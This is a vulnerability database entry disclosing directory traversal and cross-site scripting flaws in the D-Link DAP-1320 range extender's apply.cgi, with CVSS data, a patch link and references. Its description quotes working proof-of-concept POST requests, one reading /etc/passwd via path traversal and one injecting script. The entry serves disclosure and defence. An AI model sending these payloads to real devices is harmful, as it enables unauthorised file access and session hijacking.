ID

VAR-201405-0650


TITLE

D-Link DAP-1320 'html_response_message' Cross-Site Scripting Vulnerability

Trust: 0.6

sources: CNVD: CNVD-2014-02961

DESCRIPTION

The D-Link DAP-1320 is a router device. D-Link DAP-1320 'html_response_message' has a cross-site scripting vulnerability. The GET parameter passed to the apply.cgi via the \"html_response_page\" GET parameter is missing filtering before returning to the user, allowing remote attackers to exploit the vulnerability to construct a malicious URI to entice the user. Parsing, get sensitive cookies, hijack sessions or perform malicious actions on the client. D-Link's DAP-1320 Wireless Range Extender suffers from both a directory traversal and a XSS vulnerability on all firmware versions. (current v. 1.20B07) --------------------------------------------------------------------------------------------------------------------- Directory Traversal CWE-22: Path Traversal The POST param 'html_response_page' of apply.cgi suffers from a directory traversal vulnerability. The following example will display the contents of /etc/passwd: http://<IP>/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D HTTP/1.1 --------------------------------------------------------------------------------------------------------------------- XSS CWE-79: Cross Site Scripting The POST param 'html_response_page' of apply.cgi suffers from a XSS vulnerability. Example: http://<IP>/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3E&login_name=Huggy&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=pop&tmp_log_pass_auth=goes&graph_code=joffrey&session_id=57687&gcode_base64=ZZTOPI%3D HTTP/1.1 --------------------------------------------------------------------------------------------------------------------- Vendor Link: http://support.dlink.com/ProductInfo.aspx?m=DAP-1320 Research Contact: K Lovett

Trust: 0.63

sources: CNVD: CNVD-2014-02961 // PACKETSTORM: 126219

IOT TAXONOMY

category:['IoT', 'Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-02961

AFFECTED PRODUCTS

vendor:d linkmodel:dap-1320scope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2014-02961

CVSS

SEVERITY

CVSSV2

CVSSV3

CNVD: CNVD-2014-02961
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2014-02961
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2014-02961

TYPE

xss, file inclusion

Trust: 0.1

sources: PACKETSTORM: 126219

PATCH

title:D-Link DAP-1320 'html_response_message' patch for cross-site scripting vulnerabilityurl:https://www.cnvd.org.cn/patchinfo/show/45533

Trust: 0.6

sources: CNVD: CNVD-2014-02961

EXTERNAL IDS

db:PACKETSTORMid:126219

Trust: 0.7

db:CNVDid:CNVD-2014-02961

Trust: 0.6

sources: CNVD: CNVD-2014-02961 // PACKETSTORM: 126219

REFERENCES

url:http://packetstormsecurity.com/files/126219/d-link-dap-1320-directory-traver

Trust: 0.6

url:http://<ip>/apply.cgi

Trust: 0.1

url:http://support.dlink.com/productinfo.aspx?m=dap-1320

Trust: 0.1

sources: CNVD: CNVD-2014-02961 // PACKETSTORM: 126219

CREDITS

Kyle Lovett

Trust: 0.1

sources: PACKETSTORM: 126219

SOURCES

db:CNVDid:CNVD-2014-02961
db:PACKETSTORMid:126219

LAST UPDATE DATE

2022-05-17T02:09:49.705000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2014-02961date:2014-05-13T00:00:00

SOURCES RELEASE DATE

db:CNVDid:CNVD-2014-02961date:2014-05-13T00:00:00
db:PACKETSTORMid:126219date:2014-04-17T22:23:03